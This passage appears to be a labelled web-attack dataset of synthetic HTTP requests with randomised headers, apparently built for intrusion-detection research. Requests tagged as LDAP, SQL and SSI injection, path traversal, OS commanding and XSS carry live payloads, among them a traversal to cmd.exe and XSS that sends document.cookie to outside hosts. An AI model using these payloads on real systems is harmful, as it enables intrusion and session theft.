ah=538&eta8=ges&ltr3=thdn&lurtuadbtuta=mkO&Aa5=090&Fr=48163924&teeas=ou2&pdtrlyy1fh=ilSg5y&heuUtacdili=9&iwstsseyrHt=1 mzshutdownmetafromes4unT[uonb

End - Id: 36670
Start - Id: 37018
class: LdapInjection
GET /ce/ltmtdt/aZ0NVOs-Mjet6uAsl32/zhejyoaytio1tt.html?owHa3iAh6i3=608286237&2woe2nue=342455523&it5roo=umsettontLseie&eThkieE=9665251&Y1x9YW=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Heijar=e33f+uW%3AfCyca&M1kPEiPEftp=gbEB&ftbseloScpEphei=aBKpxq&hiG=ii++perlpb%2F&s2u=rtnIinsertstdinbt HTTP/1.0
Host: 201.76.253.32:80
Connection: tUimind
Accept: image/*;q=0.9, text/xml
Accept-Charset: iso-8859-6;q=0.3, x-mac-arabic;q=0.7, x-mac-japanese;q=0.8
Accept-Encoding: compress;q=0.8, identity;q=0.9, deflate
Accept-Language: ees-re2e, u-614;q=0.4, thi-ogt, b-beOh3hut, nisbrpx-vZ;q=0.0
Cache-Control: only-if-cached
Client-ip: 96.238.108.221
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="80"
Date: Sun, 01 Feb 04 15:35:15 UTC
ETag: W/"M2xwjae@G8gpcI6el9.Y"
Expect: 100-continue
From: B3nrc@Ecode1.gov
If-Modified-Since: Tue, 24 Aug 04 11:09:51 CET
If-Unmodified-Since: Fri, 14 Apr 06 06:26:57 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 61
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: roml abl8p=2srnf
Range: 00177-,0-7679,-82265
Referer: http://eleiodit.be/ihhnits/yeaet.mp3
TE: chunked;q=0.1
Trailer: Accept-Language
User-Agent: dI@C44m5w http://www.oew4ra.st
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: 7.7 www.dncf.html, 4.5 www.iy3rs.tiff:20, 3.9 155.57.126.158:412
Transfer-Encoding: tvtacS
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37018
Start - Id: 43798
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.fAdxlai.net
Connection: close
Accept: */*
Accept-Charset: iso-8859-8;q=0.3, windows-1252;q=0.8, iso-8859-4, cp-936
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 209.54.112.168
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="3"
Date: Sun, 26 Sep 04 21:27:56 UTC
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: dhegnagd=62iivlh3;nnyeyrs=kyKh
From: qto7read@r8owxth.de
If-Modified-Since: Fri, 26 Jun 09 02:26:36 UTC
If-Unmodified-Since: Thu, 28 Jul 05 19:48:37 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 16:04:14 GMT
Max-Forwards: 039
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: Digest realm
Range: 904036-,02113-35,44499-
Referer: http://tcgpo.biz/moinE.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 1.2; is-5S; rv:9.6.9) Gecko/49003852
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: identity
Upgrade: Vsr3e/6.8
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43798
Start - Id: 37788
class: LdapInjection
GET /ccSJhpJXetc3/qVgVnUWLA/5F4M/edjhiR9tuveIehghEg/ee1mlc8mIAdfknyc5a6/e-a9ZEdyOZ.5fnCYLV/0Rs@ttNs26pyqj@p/ct2@./ekf/nteth9tPzpte2ah/dB0/luI.msf?hdslec6=-cmd&yl1iredoruehts=sceujul&eagt=meta&h2gutne=hy%40_81JmGlN&rnton3iiOll=rm6rhl&ne=%29++++%28++%7C+++%28displayName%3Dhad*%29%28name%3D+++had*%29%28mail%3Dhad*++%29&vg@c=712498&iTafta0asO=39864&eZtt=aaodnAittim HTTP/1.0
Host: 119.221.12.255
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2, x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=71
Client-ip: 3.185.76.253
Cookie: bloetrip=17;yisvejehiv5=A
Cookie2: $Version="03"
Date: Thu, 27 May 04 14:04:51 UTC
ETag: W/"h6vB3KF92zhMxzvOX9n"
Expect: 100-continue
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Thu, 28 Oct 04 01:28:49 UTC
If-Unmodified-Since: Mon, 28 Jul 08 08:54:41 GMT
If-Match: *
If-None-Match: "xP.2rvy@Kyq-1nFiQacF"
If-Range: Thu, 22 Jun 06 08:08:38 UTC
Max-Forwards: 348
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM dlN6ZDlvTjNUaGd0ZWVpdGthc010YXR6YzVpakFFaVB0SQ==
Authorization: Basic UmVhZXB5bDpzZG90aQ==
Range: 985797-045,63371-
Referer: /c8hstaRc.exe
TE: gzip,trailers
Trailer: Expect
User-Agent: Mozilla/5.6 (X11; U; Solaris 0.3; ze-nf; rv:9.0.0) Gecko/73652674
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 807x162
Via: 3.5 190.223.81.43:53
Transfer-Encoding: deflate
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37788
Start - Id: 40636
class: SSI
GET /IrehsnasTDb5jsPs/nasei3enasnse/NtrinioaseM8lhr0nn/et7rhsrdS/vIM1/isei2sacdruiqowa/nVLwsAP67bE9/i1nincluderfOePkQU4G/h4ntrtaoazkha9el.jpg?saeopB2nq4belvo=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&cnbilnlWgaehdr=gkinput&7nseIrdema2=Xiyn+src HTTP/1.1
Host: 118.7.91.12
Connection: close
Accept: application/zip, text/html;q=0.1, application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.7, identity
Accept-Language: *;q=0.1
Cache-Control: max-stale=15
Client-ip: 90.139.110.154
Cookie: sgoTk6H=808;4lr2s7et5dhaAt3=33408;teepeoniJa=24;nfeTetq=rpwwindow.openn8;arlSdo=urcettt1tsae0wn
Cookie2: $Version="8"
Date: Wed, 04 Nov 09 23:55:58 CET
ETag: "m7wT1MXVgoZidB6ICIZ"
Expect: faesi3c
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Sat, 26 Dec 09 01:11:33 CET
If-Unmodified-Since: Mon, 01 Mar 10 12:01:38 UTC
If-Match: *
If-None-Match: *
If-Range: "rpd-W03w7gwULXneB"
Max-Forwards: 173
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: Basic Y29kaTp3VEU0Uw==
Range: -916,268-761609,54-38396
Referer: /trds/shtesttf/oietc3vn.css
TE: chunked;q=0.0,trailers,gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: e7pnHbI2lA3isag
UA-CPU: Sparc
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
Transfer-Encoding: deflate
Upgrade: 3ri/5.3, 3tr/9.3, daeuf/7.9, h2tiee/5.4, i6epn/2.5
Warning: 723 www.Uxehyne.html "ycdtssattZee" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40636
Start - Id: 44912
class: PathTransversal
GET /nllohgecu/9cj631dmeDeN2dewl9s0/NLfWrEraf-bin/oT-9JkKSVS/aoeioquddotzoo2bz0n/fnteeeeirNern/pH0vjsvx@VhzY.shtml?Q33bin.i8bRN=6208575009&gsHsnoatlmo=omroEsy9sdgAFLe&ieaaoei=sObQq%40uGIsTB&RX9ICnullEUMw=rldpoa&aeEcnelemRz=ep&Qsvh1rolio8=%3FntbMktPrae&a3akooaacdooGg=ebG62qV00Gw&hrY.cuzEti=36&iiiaxlud9h8=6&agbwtrorfre=file%3A%2F%2F%2Fm%3A%2Fdp27W%2Fhxs%2Feot7Tie.xml&AHgFDw0rtC=MmhRihrrT4ww&_cFstylex=096416&uatAwe57a0=1 HTTP/1.1
Host: 128.208.209.243
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: eRNL-helEr;q=0.1
Cache-Control: 3prsH=7Eiooao
Client-ip: 117.77.195.37
Cookie: onwbdas=7si;a5tau=amttqeceka3ahc;Ueai7in=37548;myeWcpse4=shEg Dh
Cookie2: $Version="49"
Date: Mon, 31 Jul 06 17:37:45 GMT
ETag: W/"iCGvu6NLpR4V-_o2.e"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sat, 17 Apr 04 24:24:40 CET
If-Unmodified-Since: Thu, 07 Oct 04 24:22:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 391
MIME-Version: 7.3
Pragma: evnada=rudRZtve
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: oaed reost=IubiEni
Range: 50635-77
Referer: http://www.mENpeax.net/egdcdldd/ontlcnrh/emin/aroli/nndna4e.pl
TE: trailers,gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: eDrp6lyvT http://www.Niez.it
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/5.8 207.104.136.242:6, emEate/3.5 193.243.86.99, 0.5 213.49.248.186
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44912
Start - Id: 46206
class: PathTransversal
GET /-S2sDid/j823vmfN/c8kvDCMlyX1mRnva7Qk9/SsatenrEg/insertnph-3ibhttpsyMtelnetv/rulcybCymail6/QFU/cbqdYh/1_SgdTHDxaQeg8/QF2.qftpas0j7Uu/cteosya/irrclhzq1desi6ecNqf.php3?locationpXcUNw=fipsmaxldeqe&ut=83&tnslaEe5qovL4a=e4hZAgi_U&@aku5z-k=S%3A%2F.htaccess%7E HTTP/1.1
Host: www.Emshihqrt.uk:80
Connection: close
Accept: image/jpeg, text/*;q=0.2, application/x-tar;q=0.0
Accept-Charset: iso-8859-9, windows-1251;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=295
Client-ip: 116.139.98.213
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="72"
Date: Tue, 05 Feb 08 15:14:49 UTC
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Sat, 02 Feb 08 01:40:20 UTC
If-Unmodified-Since: Wed, 08 Apr 09 19:57:27 UTC
If-Match: *
If-None-Match: *
If-Range: "zqUu0-3EU3ISXYcO"
Max-Forwards: 4
MIME-Version: 5.7
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Digest algorithm=MD5-sess
Range: 684-,-674552,060-
Referer: http://DhqHiib.ch/Ncrepon/Tn3demnk/0tnZ.exe
TE: gzip,trailers
Trailer: Date
User-Agent: Mozilla/4.1 (X11; U; Linux i586 7.0; ce-is; rv:5.6.5) Gecko/33143824
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9556x4656
Via: 6.5 231.32.166.77, 1.9 17.12.20.169
Transfer-Encoding: reauo; w1wRcde=ltxq6e
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: -------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46206
Start - Id: 47431
class: XSS
GET /h72d4_uRJ_Mv8f5/vwtgSu9gcQt/wssDcOpo5inefc29h9/rx.I8zi-lSB3mj/3nre/hieapxdDrAeaDhiw/ev03v/b2/hYkiK3iJxVED9.js?muexoEbvtt=%3Cobject++++classid+++%3D+++%22++++clsid%3A...++++%22+++codebase++++%3D++%22++++javascript%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ll.com%2Fcgi-bin%2Fer.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++%3E&tftgn13tsi=%3Amcs+oSsenk&stp2aa=%3Fbinn1b&2e=e7RwNPEDi&XscriptmochawhereQ1KvP=nupdateci7&@0wY@NX=%25uy&1irag4a4N6ietaa=371847227&fiv=Gestgonaea6tnco HTTP/1.0
Host: www.uNefeyEah.ch
Connection: keep-alive
Accept: image/*, video/mpeg;q=0.0, video/*;q=0.4
Accept-Charset: euc-kr;q=0.7, iso-2022-jp;q=0.4, utf-7;q=0.8
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: min-fresh=6074
Client-ip: 150.26.240.194
Cookie: aife8ohhfc=50558
Cookie2: $Version="05"
Date: Fri, 17 Apr 09 08:09:03 GMT
ETag: W/"EmqnteRvZct92Od"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Sat, 09 Dec 06 24:36:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Jan 10 06:50:33 UTC
Max-Forwards: 561
MIME-Version: 3.0
Pragma: AkcfEnt=p
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: Basic YXQ5c2VwdDpycWxkQXpJdA==
Range: 13744-31405
Referer: /awSya.gif
TE: chunked
Trailer: Referer
User-Agent: Mozilla/1.6 (X11; U; Linux i586 8.4; qe-ri; rv:4.2.7) Gecko/13681232
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 5.1 www.asey6o.jpeg, 8.0 www.Oantu.gif
Transfer-Encoding: feaz; gMr9en=emae3t
Upgrade: cn0/7.2, eS1l/7.0, wilq/0.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47431
Start - Id: 40509
class: SSI
GET /he3YUHUpd/e0CF8xZS.KG7UvyxPUdV/eNRoOtl1efey/dFDM8zAeMn2E.asmx?EKgcjvbscriptDacceptn_d5=dngo&cbenlq=8277478371&-qnYB0I=99977396&pasAaslhgi=+%40oy4t&ta8tqoag1iacnow=cdl&ur1hwdes9c=%3C%21--+%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&kDatsue6oleAsn=%24nhu5ss%2Fciphm%3Econnecto&9sU5evsimereate=%26%24padmind&w8rpwQlr6c=hrh&oKwhereHQLCOselect=7nnlu&ODs36FEBDwn=unionosa&hrRct9e6t=lysehgufnaccess_logtseiahtaccesr%7E&yee=%5Cp&pjrnTirIctIsut=5 HTTP/1.0
Host: 200.192.77.55
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1252, us-ascii;q=0.8, gb2312, x-mac-arabic
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: max-age=92
Client-ip: 68.175.116.43
Cookie: WZzCW5=for: ggtlbody~o$;OXTcgMinputG=n_3Fvk-mfgh_;semLnoi7erl=jre9nieettioeoAar;dIsrwwres=eo.vaRr;LTwM=447837;Wn=tcasam8(jcgcatstt)a
Cookie2: $Version="147"
Date: Mon, 24 Nov 08 04:42:59 CET
ETag: W/"zLqgyuQFF8K8SVYM"
Expect: 100-continue
From: dtmxe@ioclgro.it
If-Modified-Since: Wed, 06 Aug 08 19:05:47 CET
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: "wEjhTywLFNfsJ0b"
If-None-Match: *
If-Range: Fri, 27 May 05 07:46:57 GMT
Max-Forwards: 54
MIME-Version: 4.1
Pragma: le=oiwoe
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: dynrxc asTt6as=oxa1p
Range: 049-19497,328865-,-538
Referer: /ngeUl/nerDvhrd.mpeg
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/1.2 (compatible; Konqueror/5.0; Solaris; 4uonuoz; ai9cos)
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: HTTP/5.8 18.28.91.80
Transfer-Encoding: identity
Upgrade: PwodS/1.9, ioHu/9.4, qtRd/1.2, ipob/0.8, Hcsnyh/2.2
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40509
Start - Id: 47487
class: XSS
GET /raSoeiimrWatnim/7lhiwbkuoail/tlmyo/RySAT.Yconnect0/ld8tfceg/rvZHtY/sr3/ginsertMF07CmOBeHc/nwecetrcYoepirehiAnb/ob1aneSpto.pl?0hrc4hinumt=6&4fqtIc=%3Cxml+id+++%3D++%22++++X++%22++++%3E%3Ca++++%3E%3Cb+%3E%26lt%3Bscript+++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.asastrta.com%2Fcgi-bin%2Feson.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb++++%3E%3C%2Fa++%3E%3C%2Fxml+%3E&6tuau0hunseD=rlsw5aad8&na=199980&oin9s=eGl-4O&OMxp_OST@8dJ=ea3&hu2letitnrfr0=hn84%3Fie&f8aniss4sP9xf=2from%29&rekmid=st&taedoddepuueez=+tsnEhc1d&_1eW5_=dvnNcQ4 HTTP/1.1
Host: 0.86.44.4:80
Connection: t1wRn
Accept: */*
Accept-Charset: iso-8859-4;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 66.213.204.241
Cookie: 09UbetweenTeS=488458;jURaYrmtBKhavingL=tseh~>-uddi|;evalBPvKtelnetgW=6801967;eis1receee=dmRrho.vRQX
Cookie2: $Version="376"
Date: Mon, 04 Jan 10 02:49:46 CET
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 08 Nov 04 09:26:04 CET
If-Unmodified-Since: Sun, 31 Aug 08 12:28:57 CET
If-Match: *
If-None-Match: "Jo5FcRmvfghqVjAzYkIH"
If-Range: Fri, 19 Jun 09 10:03:58 GMT
Max-Forwards: 544
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: http://eceT.com/do4lkndi.sh
TE: trailers,trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/8.1 (compatible; iMhnguc; Unix; onlme5ziae; lehe3syt0D; cdEgignnO0)
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: identity
Upgrade: ehTh/2.2, etnsh/9.8, hi5/2.0
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47487
Start - Id: 37793
class: LdapInjection
GET /Yghre/niw_N4UEQ8r2bVmH/T2ergabIsioeme/eEpnerhgurlSeeanenS.swf?oiemaTaefof=or&eqsiar5c1eporSn=hkwn&oXdtTaceuobigEO=5899&passthruq2Z1AeW=1aa+ewa+5a153%3Ew&e2orsen=2153&teymss=%25A84&nEeya=n2aswe&senuues0Er=eoEr3echo%5DtioUspl&awectniAee12=40821088&oeTea=lhttpsggdm&uCkvxtermOyRdorai=%29%28+++%7C+++%28ee%3Dlioke*%29&qEuz6nsi=tEoo7RhiroAne&catdc=ycxuNdwNhsi9otw&enskkd75smgd=nyxBCV&ivtge8de=fac%2Ft HTTP/1.0
Host: 166.144.69.205
Connection: close
Accept: application/*, image/png, application/rtf;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: sa='maq4'
Client-ip: 200.223.145.89
Cookie: jekqf-cIt2VQ=a$s;tRl=ny7Nd
Cookie2: $Version="89"
Date: Fri, 06 Jan 06 12:46:17 UTC
ETag: W/"v4Jd_fMeChEj0Ulgn"
Expect: h2tit=i1adelef
From: uh7w@ednaarot.de
If-Modified-Since: Fri, 11 Feb 05 07:51:37 UTC
If-Unmodified-Since: Wed, 03 Mar 04 05:02:03 CET
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: *
If-Range: *
Max-Forwards: 4767
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest realm
Range: 849-,1727-46918,-68
Referer: /8onjte/2dtehdb/stnix/srtfa.jsp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 6.7; zt-Ss; rv:5.1.5) Gecko/11191480
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 800x7457
Via: 9.5 12.189.233.108:313
Transfer-Encoding: identity
Upgrade: et7h/0.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 313321
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37793
Start - Id: 41513
class: SqlInjection
PUT /rgZ_mKfTc/location9EkfaoQb/eb1-F1PYdjq8/fF/tsaenecrdcix/iP8lr/Ildiea0T8rrl2FitpGL.png? HTTP/1.0
Content-Length: 180
Content-Language: s1ewAI,o89a
Content-Encoding: gzip
Content-Location: /oEDol/1twErth/Boaeit/azsd/l1MAjfu.wav
Content-MD5: c3RvbnRpbnNUamFyYWhlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Nov 09 17:26:35 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: www.hetl8QlDe.uk
Connection: dahmnA
Accept: application/*;q=0.2, image/*
Accept-Charset: x-mac-chinesetrad, windows-1258, macintosh;q=0.1, big5;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 3.75.152.42
Cookie: 8stdintcaUI=8Oeomni;mfteITqje=zmuu6tuR
Cookie2: $Version="3"
Date: Mon, 29 Sep 08 05:22:01 UTC
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Sat, 05 Apr 08 02:41:36 UTC
If-Unmodified-Since: Wed, 19 Dec 07 19:03:33 UTC
If-Match: *
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: Sat, 08 Mar 08 15:10:18 GMT
Max-Forwards: 441
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: NTLM Z2NMbHU2UnNuRWh0YXpuYm5udmlueWRCeXRzYXc0ZGRzY3I=
Range: 229-94,-0,-455
Referer: /inNZune.wmn
TE: chunked,trailers
Trailer: User-Agent
User-Agent: 4gvTtereftewruidrku0
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: aMeig3/4.7 www.edelerkf.png, 0.7 179.93.126.143:9, naa/7.5 www.IeGes.html:6832
Transfer-Encoding: compress
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yatLmpplsiiusnx=01532879&se5ezewu8=381708&efsobOse=xm3de&ppw=sptDPmsl&oneijmueTs=E(e&tz&jse='  OR 'phmaeit' >   'S&dpldlae= eeR&ewn=&:xterm&s&bychitls=41L.rIbPn

End - Id: 41513
Start - Id: 37082
class: LdapInjection
GET /osnnreHvj4e2fmDc/nF/bFxussT-qS/s4QN/FoptlFboLKnW5/I4QX-hOopenOGZ/ccawenidmdnih/hQQ0nG@hQ2/eosqbvt0lrlsenen/twwyg7n4zf9_TaOPw/hruenyb/natorcT.htm?zvssLalc=560&bnifgEls7=731147005&hee3oeNo2Snitat=92&YqjusroH=ecin7oic3Ul&gmetbFTi2absgae=9264&Aey4iddsnOielo=tmph%28e%22Ajnnfxi%5Cs+0&JF_.RCg8RM=%29+++%28%7C++++%28nrs%3Diom*%29&IBqQbG2h4=hsietnesme23Rx6EH&e0uitesuist=rrrrr6hyya&dcc=th%7Ceyiand%3D&Ikt=7&jaia=5eolyo&e9thzclai2h=898224 HTTP/1.0
Host: www.elFcvh1s.biz:80
Connection: sbeoriml
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.2, identity
Accept-Language: *
Cache-Control: max-stale=81501
Client-ip: 154.56.180.14
Cookie: thAsmrtci=SosddhfaOoehc
Cookie2: $Version="6"
Date: Tue, 04 Sep 07 20:06:00 CET
ETag: "zuQy6UP2oJx68ZPfZ"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Sat, 15 Aug 09 01:53:42 UTC
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: "Yt2B1-5CTsaClaXQ_jmg"
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 20
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: NTLM dW9hYXNsckVhcWVyMGREM2RiQ0FocG5uZXNvYW5xbnRvMWlnZXViY20=
Range: -5
Referer: /kwtb5/gzdt/mttsi/ed8nvinr/unohxdn.asp
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.1 (compatible; Konqueror/2.1; Open BSD i386; lontP1zotI; nreiPA; eaper2)
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: 4.0 www.Aasuneu.gif:17, 5.5 78.123.220.64, HTTP/5.9 www.tacbdhd.htm
Transfer-Encoding: compress
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 905 www.ilsemrE.gif "n9hMwntaulc" "Sat, 03 Nov 07 02:21:06 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37082
Start - Id: 49070
class: XPathInjection
